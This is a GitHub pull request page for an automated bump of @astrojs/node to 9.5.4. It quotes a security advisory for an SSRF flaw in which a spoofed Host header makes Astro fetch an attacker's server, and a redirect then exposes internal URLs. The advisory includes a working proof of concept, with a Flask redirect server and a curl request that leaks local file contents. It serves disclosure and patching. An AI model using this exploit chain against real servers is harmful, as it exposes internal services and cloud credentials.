
chore(deps): update dependency @astrojs/node to v9.5.4 [security]#10183

Merged
renovate[bot] merged 1 commit into
mainfrom
renovate/npm-astrojs-node-vulnerability
Feb 24, 2026

Conversation

@renovate

@renovate renovate Bot commented Feb 24, 2026

Contributor

This PR contains the following updates:

Package                | Change
@astrojs/node (source) | 9.5.2 -> 9.5.4

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2026-25545

Summary

Server-Side Rendered pages that return an error with a prerendered custom error page (e.g. 404.astro or 500.astro) are vulnerable to SSRF. If the Host: header is changed to an attacker's server, it will be fetched on /500.html and they can redirect this to any internal URL to read the response body through the first request.

Details

The following line of code fetches statusURL and returns the response back to the client:

https://github.com/withastro/astro/blob/bf0b4bfc7439ddc565f61a62037880e4e701eb05/packages/astro/src/core/app/base.ts#L534

statusURL comes from this.baseWithoutTrailingSlash, which is built from the Host: header. prerenderedErrorPageFetch() is just fetch(), and follows redirects. This makes it possible for an attacker to set the Host: header to their server (e.g. Host: attacker.tld), and if the server still receives the request without normalization, Astro will now fetch http://attacker.tld/500.html.

The attacker can then redirect this request to http://localhost:8000/ssrf.txt, for example, to fetch any locally listening service. The response code is not checked, because as the comment in the code explains, this fetch may give a 200 OK. The body and headers are returned back to the attacker.

Looking at the vulnerable code, the way to reach this is if the renderError() function is called (error response during SSR) and the error page is prerendered (custom 500.astro error page). The PoC below shows how a basic project with these requirements can be set up.

Note: Another common vulnerable pattern for 404.astro we saw is:

return new Response(null, {status: 404});

Also, it does not matter what allowedDomains is set to, since it only checks the X-Forwarded-Host: header.

https://github.com/withastro/astro/blob/9e16d63cdd2537c406e50d005b389ac115755e8e/packages/astro/src/core/app/base.ts#L146

PoC

  1. Create a new empty project:
npm create astro@latest poc -- --template minimal --install --no-git --yes
  2. Create poc/src/pages/error.astro which throws an error with SSR:
---
export const prerender = false;

throw new Error("Test")
---
  3. Create poc/src/pages/500.astro with any content like:
<p>500 Internal Server Error</p>
  4. Build and run the app:
cd poc
npx astro add node --yes
npm run build && npm run preview
  5. Set up an "internal server" which we will SSRF to. Create a file called ssrf.txt and host it locally on http://localhost:8000:
cd $(mktemp -d)
echo "SECRET CONTENT" > ssrf.txt
python3 -m http.server
  6. Set up the attacker's server with the exploit code and run it, so that it becomes available on http://localhost:5000:
# pip install Flask
from flask import Flask, redirect

app = Flask(__name__)

# Astro fetches <Host>/500.html; answer with a redirect to an internal URL
@app.route("/500.html")
def exploit():
    return redirect("http://127.0.0.1:8000/ssrf.txt")

if __name__ == "__main__":
    app.run()  # listens on http://localhost:5000 by default
  7. Send the following request to the server, and notice the 500 error returns "SECRET CONTENT".
$ curl -i http://localhost:4321/error -H 'Host: localhost:5000'
HTTP/1.1 500 OK
content-type: text/plain
date: Tue, 03 Feb 2026 09:51:28 GMT
last-modified: Tue, 03 Feb 2026 09:51:09 GMT
server: SimpleHTTP/0.6 Python/3.12.3
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

SECRET CONTENT

Impact

An attacker who can access the application without Host: header validation (e.g. through finding the origin IP behind a proxy, or just by default) can fetch their own server to redirect to any internal IP. With this they can fetch cloud metadata IPs and interact with services in the internal network or localhost.

For this to be vulnerable, a common feature needs to be used, with direct access to the server (no proxies).


Release Notes

withastro/astro (@astrojs/node)

v9.5.4

Compare Source

Patch Changes
  • #15564 522f880 Thanks @matthewp! - Add a default body size limit for server actions to prevent oversized requests from exhausting memory.

  • #15572 ef851bf Thanks @matthewp! - Upgrade astro package support

    astro@5.17.3 includes a fix to prevent Action payloads from exhausting memory. @astrojs/node now depends on this version of Astro as a minimum requirement.

v9.5.3

Compare Source

Patch Changes
  • c13b536 Thanks @matthewp! - Improves error page loading to read from disk first before falling back to configured host

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot added the dependencies Pull requests that update a dependency file label Feb 24, 2026
@changeset-bot

changeset-bot Bot commented Feb 24, 2026


⚠️ No Changeset found

Latest commit: 8b37bf8

Merging this PR will not cause a version bump for any packages. If these changes should not result in a new version, you're good to go. If these changes should result in a version bump, you need to add a changeset.

This PR includes no changesets

When changesets are added to this PR, you'll see the packages that this PR includes changesets for and the associated semver types


@nx-cloud

nx-cloud Bot commented Feb 24, 2026


View your CI Pipeline Execution ↗ for commit 8b37bf8

Command                                            | Status       | Duration
nx affected --targets=test:sherif,test:knip,tes... | ✅ Succeeded | 4m 13s
nx run-many --target=build --exclude=examples/*... | ✅ Succeeded | 1s

☁️ Nx Cloud last updated this comment at 2026-02-24 10:55:59 UTC

@coderabbitai

coderabbitai Bot commented Feb 24, 2026

Contributor

Important

Review skipped

Review was skipped due to path filters

⛔ Files ignored due to path filters (1)
  • pnpm-lock.yaml is excluded by !**/pnpm-lock.yaml

CodeRabbit blocks several paths by default. You can override this behavior by explicitly including those paths in the path filters. For example, including **/dist/** will override the default block on the dist directory, by removing the pattern from both the lists.

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.


@pkg-pr-new

pkg-pr-new Bot commented Feb 24, 2026


@tanstack/angular-query-experimental

npm i https://pkg.pr.new/@tanstack/angular-query-experimental@10183

@tanstack/eslint-plugin-query

npm i https://pkg.pr.new/@tanstack/eslint-plugin-query@10183

@tanstack/preact-query

npm i https://pkg.pr.new/@tanstack/preact-query@10183

@tanstack/query-async-storage-persister

npm i https://pkg.pr.new/@tanstack/query-async-storage-persister@10183

@tanstack/query-broadcast-client-experimental

npm i https://pkg.pr.new/@tanstack/query-broadcast-client-experimental@10183

@tanstack/query-core

npm i https://pkg.pr.new/@tanstack/query-core@10183

@tanstack/query-devtools

npm i https://pkg.pr.new/@tanstack/query-devtools@10183

@tanstack/query-persist-client-core

npm i https://pkg.pr.new/@tanstack/query-persist-client-core@10183

@tanstack/query-sync-storage-persister

npm i https://pkg.pr.new/@tanstack/query-sync-storage-persister@10183

@tanstack/react-query

npm i https://pkg.pr.new/@tanstack/react-query@10183

@tanstack/react-query-devtools

npm i https://pkg.pr.new/@tanstack/react-query-devtools@10183

@tanstack/react-query-next-experimental

npm i https://pkg.pr.new/@tanstack/react-query-next-experimental@10183

@tanstack/react-query-persist-client

npm i https://pkg.pr.new/@tanstack/react-query-persist-client@10183

@tanstack/solid-query

npm i https://pkg.pr.new/@tanstack/solid-query@10183

@tanstack/solid-query-devtools

npm i https://pkg.pr.new/@tanstack/solid-query-devtools@10183

@tanstack/solid-query-persist-client

npm i https://pkg.pr.new/@tanstack/solid-query-persist-client@10183

@tanstack/svelte-query

npm i https://pkg.pr.new/@tanstack/svelte-query@10183

@tanstack/svelte-query-devtools

npm i https://pkg.pr.new/@tanstack/svelte-query-devtools@10183

@tanstack/svelte-query-persist-client

npm i https://pkg.pr.new/@tanstack/svelte-query-persist-client@10183

@tanstack/vue-query

npm i https://pkg.pr.new/@tanstack/vue-query@10183

@tanstack/vue-query-devtools

npm i https://pkg.pr.new/@tanstack/vue-query-devtools@10183

commit: 8b37bf8

@github-actions

Contributor

size-limit report 📦

Path Size
react full 11.92 KB (0%)
react minimal 8.95 KB (0%)

@renovate renovate Bot merged commit 807c8a9 into main Feb 24, 2026
7 checks passed
@renovate renovate Bot deleted the renovate/npm-astrojs-node-vulnerability branch February 24, 2026 12:46

Labels

dependencies Pull requests that update a dependency file
